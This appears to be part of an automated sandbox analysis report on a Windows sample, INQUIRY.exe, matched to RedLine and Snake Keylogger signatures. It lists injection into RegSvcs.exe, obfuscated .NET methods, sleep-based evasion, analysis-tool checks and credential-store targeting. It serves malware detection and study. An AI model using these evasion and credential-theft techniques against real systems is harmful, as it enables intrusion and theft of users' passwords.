              Source: 00000002.00000002.1709473928.0000000001DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: RegSvcs.exe PID: 7348, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
              Source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
              Source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
              Source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
              Source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
              Source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
              Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
              Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
              Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, UltraSpeed.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, COVIDPickers.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
              Source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/6@3/3
              Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A7A06A GetLastError,FormatMessageW, 0_2_00A7A06A
              Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A681CB AdjustTokenPrivileges,CloseHandle, 0_2_00A681CB
              Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A687E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_00A687E1
              Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A7B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_00A7B3FB
              Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A8EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_00A8EE0D
              Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A883BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear, 0_2_00A883BB
              Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A14E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00A14E89
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
              Source: C:\Users\user\Desktop\INQUIRY.exe | File created: C:\Users\user\AppData\Local\Temp\aut7EA8.tmp
              Source: INQUIRY.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\INQUIRY.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: RegSvcs.exe, 00000003.00000002.4150460368.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150460368.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150460368.00000000030E0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: INQUIRY.exe | Virustotal: Detection: 45%
              Source: INQUIRY.exe | ReversingLabs: Detection: 47%
              Source: unknown | Process created: C:\Users\user\Desktop\INQUIRY.exe "C:\Users\user\Desktop\INQUIRY.exe"
              Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\INQUIRY.exe"
              Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Users\user\Desktop\INQUIRY.exe "C:\Users\user\Desktop\INQUIRY.exe"
              Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\INQUIRY.exe"
              Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\INQUIRY.exe"
              Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Users\user\Desktop\INQUIRY.exe "C:\Users\user\Desktop\INQUIRY.exe"
              Source: C:\Users\user\Desktop\INQUIRY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\INQUIRY.exe"
              Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: wsock32.dll
              Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: mpr.dll
              Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: wsock32.dll
              Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: mpr.dll
              Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\INQUIRY.exe | Section loaded: wldp.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: INQUIRY.exe | Static file information: File size 1091584 > 1048576
              Source: INQUIRY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: INQUIRY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: INQUIRY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: INQUIRY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: INQUIRY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: INQUIRY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: INQUIRY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: _.pdb source: RegSvcs.exe, 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: INQUIRY.exe, 00000000.00000003.1692742553.0000000003A10000.00000004.00001000.00020000.00000000.sdmp, INQUIRY.exe, 00000000.00000003.1693204373.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, INQUIRY.exe, 00000002.00000003.1707799950.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, INQUIRY.exe, 00000002.00000003.1704430637.0000000003A10000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: INQUIRY.exe, 00000000.00000003.1692742553.0000000003A10000.00000004.00001000.00020000.00000000.sdmp, INQUIRY.exe, 00000000.00000003.1693204373.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, INQUIRY.exe, 00000002.00000003.1707799950.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, INQUIRY.exe, 00000002.00000003.1704430637.0000000003A10000.00000004.00001000.00020000.00000000.sdmp
              Source: INQUIRY.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: INQUIRY.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: INQUIRY.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: INQUIRY.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: INQUIRY.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              Source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A14B37 LoadLibraryA,GetProcAddress, 0_2_00A14B37
              Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A7848F push FFFFFF8Bh; iretd 0_2_00A78491
              Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A3E70F push edi; ret 0_2_00A3E711
              Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A3E828 push esi; ret 0_2_00A3E82A
              Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A38945 push ecx; ret 0_2_00A38958
              Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A3EAEC push edi; ret 0_2_00A3EAEE
              Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A3EA03 push esi; ret 0_2_00A3EA05
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041C40C push cs; iretd 3_2_0041C4E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00423149 push eax; ret 3_2_00423179
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041C50E push cs; iretd 3_2_0041C4E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0040E21D push ecx; ret 3_2_0040E230
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041C6BE push ebx; ret 3_2_0041C6BF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041BFCD pushad ; ret 3_2_0041BFCE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0040BB97 push dword ptr [ecx-75h]; iretd 3_2_0040BBA3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02BA52A6 push esp; ret 3_2_02BA52A9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06C62E40 push 18418B06h; ret 3_2_06C62E53
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06C6AF84 push dword ptr [ecx+ecx-75h]; iretd 3_2_06C6AF8A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06C65FA1 push 10418B06h; ret 3_2_06C65FB3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06C6B421 push C0335006h; mov dword ptr [esp], eax 3_2_06C6B44B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06C66A90 push 2C418B06h; ret 3_2_06C66AA3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06C66AB1 push 0C418B06h; ret 3_2_06C66AC3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06C66A10 push 1C418B06h; ret 3_2_06C66A23
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06C660B0 push 18418B06h; ret 3_2_06C660C3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06C63824 push 04418B06h; ret 3_2_06C660A3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_06C669D1 push 08418B06h; ret 3_2_06C669E3
              Source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'eKYVC7ZjuiDv8', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'eKYVC7ZjuiDv8', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'eKYVC7ZjuiDv8', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'eKYVC7ZjuiDv8', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'eKYVC7ZjuiDv8', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00A148D7
              Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A95376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00A95376
              Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A33187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00A33187
              Source: C:\Users\user\Desktop\INQUIRY.exe | Process information set: NOOPENFILEERRORBOX (4 identical entries)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX (59 identical entries)

              Malware Analysis System Evasion

              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7348, type: MEMORYSTR
              Source: C:\Users\user\Desktop\INQUIRY.exeAPI/Special instruction interceptor: Address: 1DA3224
              Source: C:\Users\user\Desktop\INQUIRY.exeAPI/Special instruction interceptor: Address: 1013224
              Source: INQUIRY.exe, 00000000.00000002.1694523249.00000000010D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEE
              Source: INQUIRY.exe, 00000002.00000002.1709315154.0000000001058000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEOR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,3_2_004019F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599124Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598468Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597921
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597593
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597373
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597265
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596281
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595843
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595624
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595515
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595406
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595296
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595186
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595077
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594966
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 7841
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 2015
Source: C:\Users\user\Desktop\INQUIRY.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes (graph_0-104894)
Source: C:\Users\user\Desktop\INQUIRY.exe | API coverage: 4.9 %
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A7445A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A7C6D1 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A7C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A7EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A7F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A7F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00A73B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
